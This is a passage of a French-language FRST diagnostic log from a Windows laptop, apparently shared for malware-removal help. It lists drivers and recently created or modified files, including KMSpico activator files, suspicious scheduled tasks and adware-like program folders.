R1 webshieldfilter; C:\Windows\System32\drivers\webshieldfilter.sys [96264 2020-05-29] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) <==== ATTENTION
S3 WinDivert1.1; C:\Program Files\KMSpico\WinDivert.sys [35376 2020-06-12] (Nemea Mjukvaruutveckling AB -> Basil Projects)
R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [34944 2018-05-11] (HP Inc. -> HP)
U4 npcap_wifi; pas de ImagePath

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Trois mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-12-09 15:19 - 2020-12-09 15:20 - 015555784 _____ C:\Users\HP\Downloads\SharpDevelop_4.4.1.9729_Setup.msi
2020-12-09 15:14 - 2020-12-09 15:19 - 000027643 _____ C:\Users\HP\Downloads\FRST.txt
2020-12-09 15:13 - 2020-12-09 15:16 - 000000000 ____D C:\FRST
2020-12-09 15:12 - 2020-12-09 15:13 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\FRST64.exe
2020-12-09 15:12 - 2020-12-09 15:12 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\Non confirmé 822175.crdownload
2020-12-09 15:12 - 2020-12-09 15:12 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\Non confirmé 739670.crdownload
2020-12-09 14:22 - 2020-12-09 14:22 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2020-12-09 14:22 - 2020-12-09 14:22 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2020-12-09 14:21 - 2020-12-09 14:21 - 000003470 _____ C:\Windows\system32\Tasks\AutoPico Daily Restart
2020-12-09 13:43 - 2020-12-09 13:54 - 000000000 ____D C:\Program Files (x86)\TotalAV
2020-12-09 13:43 - 2020-12-09 13:43 - 000001089 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
2020-12-09 13:43 - 2020-12-09 13:43 - 000001064 _____ C:\Users\Public\Desktop\TotalAV.lnk
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\Users\HP\AppData\Local\GUI.Win
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\ProgramData\TotalAV
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\ProgramData\SecuritySuite
2020-12-09 13:43 - 2020-05-29 09:15 - 000096264 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\webshieldfilter.sys
2020-12-09 13:42 - 2020-12-09 13:42 - 054108544 _____ C:\Users\HP\Downloads\TotalAV_Setup.exe
2020-12-09 13:10 - 2020-12-09 13:10 - 000195424 _____ (HelpSrv Network) C:\Windows\helpsrv.sys
2020-12-09 13:10 - 2020-12-09 13:10 - 000000000 ____D C:\ProgramData\sib
2020-12-09 13:09 - 2020-12-09 13:09 - 000032768 _____ C:\Users\HP\AppData\Roaming\1607515759026-shm
2020-12-09 13:09 - 2020-12-09 13:09 - 000000000 _____ C:\Users\HP\AppData\Roaming\1607515759026-wal
2020-12-09 13:08 - 2020-12-09 13:09 - 000000000 ____D C:\Users\Public\Thunder Network
2020-12-09 13:08 - 2020-12-09 13:08 - 000000000 ____D C:\ProgramData\Thunder Network
2020-12-09 13:07 - 2020-12-09 13:36 - 000000000 ____D C:\Users\HP\AppData\Roaming\i1n4djy5svb
2020-12-09 13:07 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files\ARN5VLCP30
2020-12-09 13:07 - 2020-12-09 13:34 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2020-12-09 13:07 - 2020-12-09 13:12 - 000000000 ____D C:\Program Files (x86)\RearRips
2020-12-09 13:07 - 2020-12-09 13:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RearRips
2020-12-09 13:07 - 2020-12-09 13:07 - 000032768 _____ C:\Users\HP\AppData\Roaming\1607515644977-shm
2020-12-09 13:07 - 2020-12-09 13:07 - 000003568 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ___HD C:\Windows\rss
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ____D C:\Program Files (x86)\Seed Trade
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ____D C:\Program Files (x86)\Bubble Browser
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 _____ C:\Users\HP\AppData\Roaming\1607515644977-wal
2020-12-09 13:02 - 2020-12-09 15:23 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yne Recorder
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files (x86)\Yne Recorder
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files (x86)\trtuy
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OSFMount
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\OSFMount
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\BestZip
2020-12-09 13:01 - 2020-12-09 13:01 - 000000000 ____D C:\Users\HP\AppData\Roaming\305f7ca580575406.60124791_888
2020-12-09 13:01 - 2014-04-03 20:22 - 000645592 _____ C:\Windows\SysWOW64\sqlite3.dll
2020-12-09 13:00 - 2020-12-09 13:06 - 000000000 ____D C:\ProgramData\AllDup
2020-12-09 13:00 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\afAllDup
2020-12-09 13:00 - 2020-12-09 13:00 - 000000000 ____D C:\Users\HP\AppData\Roaming\AllDup
2020-12-09 12:58 - 2020-12-09 12:58 - 000000000 ____D C:\Users\HP\AppData\Local\Piders
2020-12-08 07:58 - 2020-12-08 07:58 - 001551804 _____ C:\Users\HP\AppData\Roaming\179442746
2020-12-07 15:26 - 2020-12-07 15:26 - 000000072 _____ C:\Users\HP\Untitled12.ipynb
2020-12-06 11:30 - 2020-12-06 11:34 - 000000000 ____D C:\Users\HP\AppData\Roaming\AnyDesk
2020-12-05 21:12 - 2020-12-05 21:12 - 001109403 _____ C:\Users\HP\Desktop\Projet Professionel Licence Fin de Formation Bongo Nts Jeffr! (Transport Logist Glo)SCM.pptx
2020-12-05 04:24 - 2020-12-05 04:25 - 000000000 ____D C:\ProgramData\Adobe
2020-12-05 04:24 - 2020-12-05 04:24 - 000000000 ____D C:\Users\HP\AppData\Roaming\Adobe
2020-12-05 02:09 - 2020-12-08 20:14 - 000000000 ____D C:\Users\HP\AppData\Local\Adobe
2020-12-04 15:29 - 2020-12-04 15:37 - 000000000 ____D C:\VIDEO
2020-12-03 17:02 - 2020-12-03 17:29 - 000001626 _____ C:\Users\HP\Untitled11.ipynb
2020-12-03 14:24 - 2020-12-03 14:56 - 000017288 _____ C:\Users\HP\Untitled10.ipynb
2020-12-03 10:38 - 2020-12-03 23:47 - 000000000 ____D C:\Users\HP\eclipse-workspace
2020-12-03 10:38 - 2020-12-03 10:38 - 000000000 ____D C:\Users\HP\AppData\Local\Eclipse
2020-12-03 10:38 - 2020-12-03 10:38 - 000000000 ____D C:\Users\HP\.tooling
2020-12-03 10:37 - 2020-12-05 19:05 - 000001166 _____ C:\Users\HP\Desktop\Eclipse IDE for Eclipse Committers - 2020-09.lnk
2020-12-03 10:37 - 2020-12-03 10:37 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Eclipse
2020-12-03 10:19 - 2020-12-03 10:19 - 000000000 ____D C:\Users\HP\eclipse
2020-12-03 09:31 - 2020-12-03 09:31 - 000000000 ____D C:\Users\HP\AppData\Local\OneDrive
2020-12-03 08:24 - 2020-12-01 13:05 - 000000030 _____ C:\AVScanner.ini
2020-12-02 23:17 - 2020-12-09 12:31 - 000000000 ____D C:\Users\HP\vpworkspace
2020-12-02 23:13 - 2020-12-09 12:07 - 000000000 ____D C:\Users\HP\visualparadigm
2020-12-02 23:12 - 2020-12-02 23:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Paradigm
2020-12-02 23:11 - 2020-12-02 23:12 - 000000000 ____D C:\Program Files\Visual Paradigm for UML 10.0
2020-12-02 22:59 - 2020-12-02 22:59 - 000562950 _____ C:\Users\HP\Desktop\Scan1.pdf
2020-12-01 19:55 - 2020-12-09 01:15 - 000000000 ____D C:\Users\HP\.p2
2020-12-01 19:55 - 2020-12-03 10:19 - 000000000 ____D C:\Users\HP\.eclipse
2020-12-01 13:03 - 2020-12-01 13:03 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-01 13:03 - 2020-12-01 13:03 - 000002124 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2020-11-26 16:29 - 2020-11-26 16:58 - 000018078 _____ C:\Users\HP\Untitled9.ipynb
2020-11-26 14:55 - 2020-11-26 16:05 - 000030914 _____ C:\Users\HP\Untitled8.ipynb
2020-11-25 23:32 - 2020-12-03 07:11 - 000000000 ____D C:\Users\HP\AppData\Roaming\Adobe.BackupByPhotoshopPortable
2020-11-25 11:25 - 2020-11-25 11:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\java
2020-11-25 11:24 - 2020-11-25 11:24 - 000000000 ____D C:\Users\HP\Documents\VPProjects
2020-11-25 10:32 - 2020-12-02 22:43 - 000000000 ____D C:\Users\HP\AppData\Roaming\VisualParadigm
2020-11-19 16:57 - 2020-11-19 17:23 - 000024696 _____ C:\Users\HP\Untitled7.ipynb
2020-11-19 16:15 - 2020-11-19 16:35 - 000027212 _____ C:\Users\HP\3_reconnaissance_chiffres_decision_tree_validation_test knn.ipynb
2020-11-19 14:41 - 2020-11-19 16:13 - 000023699 _____ C:\Users\HP\2_reconnaissance_chiffres_decision_tree_validation_test (1) (1).ipynb
2020-11-19 14:41 - 2020-11-19 14:41 - 000000072 _____ C:\Users\HP\Untitled6.ipynb
2020-11-19 14:34 - 2020-11-19 14:41 - 000000779 _____ C:\Users\HP\Untitled5.ipynb
2020-11-19 10:39 - 2020-11-19 10:39 - 000001092 _____ C:\Users\Public\Desktop\Enterprise Architect.lnk
2020-11-19 10:39 - 2020-11-19 10:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Enterprise Architect 13
2020-11-18 19:51 - 2020-11-18 19:51 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2020-11-18 19:45 - 2020-11-18 19:45 - 000000000 ____D C:\Users\HP\AppData\Roaming\Wireshark
2020-11-18 19:13 - 2020-11-18 19:13 - 000000000 ____D C:\Users\HP\AppData\Roaming\xm1
2020-11-18 17:25 - 2020-11-18 17:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\Dev-Cpp
2020-11-18 17:24 - 2020-11-18 17:24 - 000001069 _____ C:\Users\HP\Desktop\Dev-C++.lnk
2020-11-18 17:24 - 2020-11-18 17:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bloodshed Dev-C++
2020-11-18 17:23 - 2020-11-18 17:23 - 000001840 _____ C:\Users\HP\rrrr.alg
2020-11-18 17:23 - 2020-11-18 17:23 - 000000000 ____D C:\Program Files (x86)\Dev-Cpp
2020-11-18 16:55 - 2020-11-18 16:55 - 000002511 _____ C:\Users\Public\Desktop\Algobox.lnk
2020-11-18 16:55 - 2020-11-18 16:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Algobox
2020-11-18 16:55 - 2020-11-18 16:55 - 000000000 ____D C:\Program Files (x86)\Algobox
2020-11-18 04:47 - 2020-11-18 04:47 - 001101312 _____ C:\Windows\SysWOW64\TextInputMethodFormatter.dll
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-11-18 04:46 - 2020-11-18 04:46 - 001841152 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2020-11-18 04:46 - 2020-11-18 04:46 - 000200704 _____ C:\Windows\system32\IHDS.dll
2020-11-18 04:46 - 2020-11-18 04:46 - 000164864 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2020-11-17 23:13 - 2020-11-20 21:34 - 000000000 ____D C:\Users\HP\AppData\Roaming\Sparx Systems
2020-11-17 23:12 - 2020-11-19 10:39 - 000000000 ____D C:\Program Files (x86)\Sparx Systems
2020-11-17 16:32 - 2020-11-18 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-11-12 16:48 - 2020-11-12 17:44 - 000002504 _____ C:\Users\HP\Untitled4.ipynb
2020-11-12 15:11 - 2020-11-12 15:53 - 000052346 _____ C:\Users\HP\Untitled3.ipynb
2020-11-12 14:52 - 2020-11-12 15:11 - 000005949 _____ C:\Users\HP\Untitled2.ipynb
2020-11-12 14:43 - 2020-11-12 14:44 - 000000000 ____D C:\Users\HP\.matplotlib
2020-11-12 14:34 - 2020-11-12 14:47 - 000021988 _____ C:\Users\HP\Untitled1.ipynb
2020-11-12 14:33 - 2020-11-12 14:33 - 000000000 ____D C:\Users\HP\.conda
2020-11-12 14:31 - 2020-11-19 17:13 - 000000000 ____D C:\Users\HP\.jupyter
2020-11-12 13:59 - 2020-11-12 13:59 - 000000000 ____D C:\Users\HP\AppData\Roaming\Jedi
2020-11-12 13:57 - 2020-11-12 13:57 - 000000000 ____D C:\Users\HP\.ipython
2020-11-12 13:56 - 2020-12-07 15:26 - 000000000 ____D C:\Users\HP\.ipynb_checkpoints
2020-11-12 13:56 - 2020-11-12 14:05 - 000001181 _____ C:\Users\HP\Untitled.ipynb
2020-11-12 13:55 - 2020-12-07 15:26 - 000000000 ____D C:\Users\HP\AppData\Roaming\jupyter
2020-11-11 22:01 - 2020-11-11 22:02 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.7
2020-11-11 22:01 - 2020-11-11 22:01 - 000000000 ____D C:\Users\HP\AppData\Local\Package Cache
2020-11-10 23:28 - 2020-11-26 12:07 - 000000000 ____D C:\Users\HP\Documents\NetBeansProjects
2020-11-10 22:44 - 2020-11-10 22:45 - 000000000 ____D C:\Users\HP\AppData\Roaming\NetBeans
2020-11-10 22:44 - 2020-11-10 22:44 - 000000000 ____D C:\Users\HP\AppData\Local\NetBeans
2020-11-10 14:53 - 2020-11-10 14:53 - 000000000 ____D C:\Program Files\Apache Software Foundation
2020-11-10 14:52 - 2020-11-10 14:53 - 000000000 ____D C:\Program Files\glassfish-4.1.1
2020-11-10 14:48 - 2020-11-10 14:48 - 000002094 _____ C:\Users\Public\Desktop\NetBeans IDE 8.2.lnk
2020-11-10 14:48 - 2020-11-10 14:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetBeans
2020-11-10 14:46 - 2020-11-10 14:56 - 000000000 ____D C:\Program Files\NetBeans 8.2
2020-11-10 14:29 - 2020-11-10 14:29 - 000000000 ____D C:\Users\HP\AppData\Roaming\Sun
2020-11-10 14:28 - 2020-11-10 14:28 - 000192168 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-11-10 14:25 - 2020-11-10 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2020-11-10 14:25 - 2020-11-10 14:28 - 000000000 ____D C:\Program Files\Java
2020-11-10 13:40 - 2020-11-10 15:12 - 000000000 ____D C:\Users\HP\.nbi
2020-11-09 13:51 - 2020-12-09 14:39 - 000001425 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2020-11-05 11:25 - 2020-11-05 11:25 - 000000000 ____D C:\Users\HP\Documents\Python Scripts
2020-11-05 11:25 - 2020-11-05 11:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)
2020-11-05 10:57 - 2020-11-12 14:34 - 000000000 ____D C:\Users\HP\Anaconda3
2020-11-03 10:56 - 2020-11-03 10:56 - 000002066 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2020-11-03 10:56 - 2020-11-03 10:56 - 000002054 _____ C:\Users\Public\Desktop\Wireshark.lnk
2020-11-03 10:51 - 2020-11-03 10:51 - 000003184 _____ C:\Windows\system32\Tasks\npcapwatchdog
2020-11-03 10:50 - 2020-11-03 10:50 - 000000000 ____D C:\Windows\SysWOW64\Npcap
2020-11-03 10:50 - 2020-11-03 10:50 - 000000000 ____D C:\Windows\system32\Npcap
2020-11-03 10:49 - 2020-11-03 10:56 - 000000000 ____D C:\Program Files (x86)\Wireshark
2020-11-03 10:49 - 2020-11-03 10:51 - 000000000 ____D C:\Program Files\Npcap
2020-11-03 10:35 - 2020-11-28 09:57 - 000000000 ____D C:\Users\HP\VirtualBox VMs
2020-11-03 10:32 - 2020-12-05 08:49 - 000000000 ____D C:\Users\HP\.VirtualBox
2020-11-03 10:32 - 2020-12-05 08:49 - 000000000 ____D C:\ProgramData\VirtualBox
2020-11-03 10:31 - 2020-11-03 10:31 - 000001149 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2020-11-03 10:31 - 2020-11-03 10:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox
2020-11-03 10:31 - 2020-11-03 10:31 - 000000000 ____D C:\Program Files\Oracle
2020-11-03 10:31 - 2020-10-16 10:04 - 001037392 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2020-11-03 10:31 - 2020-10-16 10:04 - 000187456 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys
2020-10-25 19:56 - 2020-10-25 20:44 - 000000000 ____D C:\Users\HP\AppData\Roaming\HandBrake
2020-10-25 19:55 - 2020-10-25 19:56 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HandBrake
2020-10-25 19:55 - 2020-10-25 19:56 - 000000000 ____D C:\Program Files\HandBrake
2020-10-25 19:55 - 2020-10-25 19:55 - 000000865 _____ C:\Users\HP\Desktop\HandBrake.lnk
2020-10-16 10:04 - 2020-10-16 10:04 - 000249344 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxNetLwf.sys
2020-10-16 10:04 - 2020-10-16 10:04 - 000239432 ____N (Oracle Corporation) C:\Windows\system32\Drivers\VBoxNetAdp6.sys
2020-10-16 10:04 - 2020-10-16 10:04 - 000174536 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSB.sys
2020-10-15 00:02 - 2020-10-06 01:13 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-15 00:02 - 2020-10-06 01:13 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-10-14 09:43 - 2020-10-14 09:43 - 001756592 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-10-14 09:43 - 2020-10-14 09:43 - 001366136 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-10-14 09:43 - 2020-10-14 09:43 - 000860160 _____ C:\Windows\system32\MBR2GPT.EXE
2020-10-14 09:43 - 2020-10-14 09:43 - 000035840 _____ C:\Windows\system32\deploymentcsphelper.exe
2020-09-30 17:29 - 2020-11-22 00:17 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-09-16 21:15 - 2020-10-05 23:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-09-16 21:15 - 2020-09-16 21:15 - 000002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk
2020-09-15 09:33 - 2020-09-15 09:33 - 000001818 _____ C:\Users\HP\Desktop\test.html
2020-09-13 11:57 - 2020-09-13 11:10 - 308812494 _____ C:\Users\HP\Desktop\CULTE 13-09-20.mp4
2020-09-13 01:22 - 2020-04-24 02:22 - 000166760 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2020-09-12 23:17 - 2019-09-26 04:43 - 000136040 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys

==================== Trois mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-12-09 15:23 - 2020-06-11 23:32 - 000000000 ____D C:\Program Files\KMSpico
2020-12-09 15:20 - 2020-06-11 23:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2020-12-09 14:46 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-12-09 14:15 - 2020-06-14 12:59 - 000000000 ____D C:\Users\HP\Desktop\DOC OBS
2020-12-09 14:11 - 2020-06-11 20:47 - 000000000 ____D C:\Users\HP\AppData\Local\CrashDumps
2020-12-09 14:11 - 2020-05-30 13:33 - 000000000 ____D C:\Windows\minidump
2020-12-09 13:33 - 2020-06-08 14:03 - 000000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2020-12-09 13:33 - 2020-06-08 14:03 - 000000000 __SHD C:\Users\HP\IntelGraphicsProfiles
2020-12-09 13:31 - 2020-06-15 17:54 - 000000000 ____D C:\ProgramData\VMware
2020-12-09 13:31 - 2020-06-08 13:22 - 000000000 ____D C:\ProgramData\Validity
2020-12-09 13:31 - 2020-05-30 13:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-12-09 13:30 - 2020-06-14 17:08 - 000000000 ____D C:\Users\HP\AppData\Roaming\uTorrent
2020-12-09 13:30 - 2019-03-19 05:37 - 001310720 _____ C:\Windows\system32\config\BBI
2020-12-09 10:54 - 2020-05-30 13:24 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-12-09 01:07 - 2020-06-14 17:10 - 000000000 ____D C:\Users\HP\AppData\Local\BitTorrentHelper
2020-12-08 23:31 - 2020-07-21 18:37 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-12-08 23:31 - 2020-07-21 18:37 - 000002280 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-12-08 23:11 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\LiveKernelReports
2020-12-08 20:03 - 2020-05-30 13:35 - 000000000 ____D C:\Users\HP
2020-12-08 14:00 - 2020-05-30 13:36 - 000000000 ____D C:\Users\HP\AppData\Local\Packages
2020-12-08 10:29 - 2020-06-15 17:59 - 000000000 ____D C:\Users\HP\AppData\Roaming\VMware
2020-12-08 08:45 - 2020-07-10 01:43 - 000000000 ____D C:\Users\HP\AppData\Local\Deployment
2020-12-08 04:00 - 2020-06-18 23:10 - 000000000 ____D C:\Users\HP\AppData\Local\ElevatedDiagnostics
2020-12-07 22:02 - 2020-06-15 17:59 - 000000000 ____D C:\Users\HP\AppData\Local\VMware
2020-12-07 14:34 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-12-07 14:34 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\AppReadiness
2020-12-07 13:27 - 2020-07-30 20:44 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-12-07 13:27 - 2020-07-30 20:44 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-12-06 19:14 - 2020-06-11 06:00 - 000000000 ____D C:\Program Files\Microsoft Office
2020-12-06 19:03 - 2020-06-14 12:04 - 000000000 ____D C:\Users\HP\AppData\Roaming\obs-studio
2020-12-06 12:19 - 2020-06-28 18:10 - 000000000 ____D C:\Users\HP\Desktop\DESKTOP-GCFI703 28-06-2020 17.49.30
2020-12-05 21:29 - 2020-07-30 20:47 - 000003522 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-12-05 04:24 - 2020-06-08 19:47 - 000000000 ____D C:\Users\HP\AppData\LocalLow\Adobe
2020-12-05 02:10 - 2020-06-08 19:46 - 000004562 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-12-05 01:01 - 2020-07-10 01:38 - 000000000 ____D C:\Users\HP\AppData\Roaming\Office Timeline
2020-12-05 01:00 - 2020-07-10 01:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Office Timeline
2020-12-04 19:36 - 2020-06-09 13:17 - 000000000 ____D C:\pasto
2020-12-04 15:53 - 2020-05-30 13:24 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-12-04 02:27 - 2020-06-11 03:15 - 000003588 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-12-04 02:27 - 2020-06-11 03:15 - 000003464 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-12-03 17:38 - 2019-03-19 05:50 - 000000000 ____D C:\Windows\INF
2020-12-01 23:42 - 2020-06-16 20:34 - 000001082 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\METEO.lnk
2020-12-01 13:05 - 2020-06-09 11:14 - 000000000 ____D C:\ProgramData\McAfee
2020-12-01 13:03 - 2020-06-08 19:45 - 000000000 ____D C:\Program Files (x86)\Adobe
2020-12-01 00:39 - 2020-08-17 13:32 - 000000000 ____D C:\Users\HP\Desktop\REGAL AFRIQUE
2020-11-27 08:28 - 2020-06-16 23:42 - 000000000 ____D C:\Users\HP\Documents\Virtual Machines
2020-11-25 09:53 - 2020-07-21 18:37 - 000003634 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-25 09:53 - 2020-07-21 18:37 - 000003510 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-23 23:04 - 2019-03-19 05:37 - 000000000 ____D C:\Windows\CbsTemp
2020-11-23 13:42 - 2020-05-30 13:35 - 001985224 _____ C:\Windows\system32\PerfStringBackup.INI
2020-11-23 13:42 - 2019-03-19 13:01 - 000870894 _____ C:\Windows\system32\perfh00C.dat
2020-11-23 13:42 - 2019-03-19 13:01 - 000185080 _____ C:\Windows\system32\perfc00C.dat
2020-11-22 09:02 - 2020-07-27 13:21 - 000000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla
2020-11-22 09:02 - 2020-07-27 13:21 - 000000000 ____D C:\ProgramData\Mozilla
2020-11-19 14:01 - 2020-08-27 11:28 - 000000000 ____D C:\Users\HP\Desktop\BAROU
2020-11-18 20:33 - 2020-05-30 13:36 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-11-18 20:33 - 2020-05-30 13:36 - 000000000 ___RD C:\Users\HP\3D Objects
2020-11-18 20:27 - 2020-05-30 13:24 - 000439128 _____ C:\Windows\system32\FNTCACHE.DAT
2020-11-18 20:26 - 2020-07-27 13:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-18 20:24 - 2019-03-19 13:04 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\TextInput
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\SysWOW64\setup
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\SystemResources
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\setup
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\oobe
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\bcastdvr
2020-11-18 19:51 - 2020-07-27 13:21 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-18 17:04 - 2020-08-13 16:14 - 000000000 ____D C:\Users\HP\Desktop\PASTO
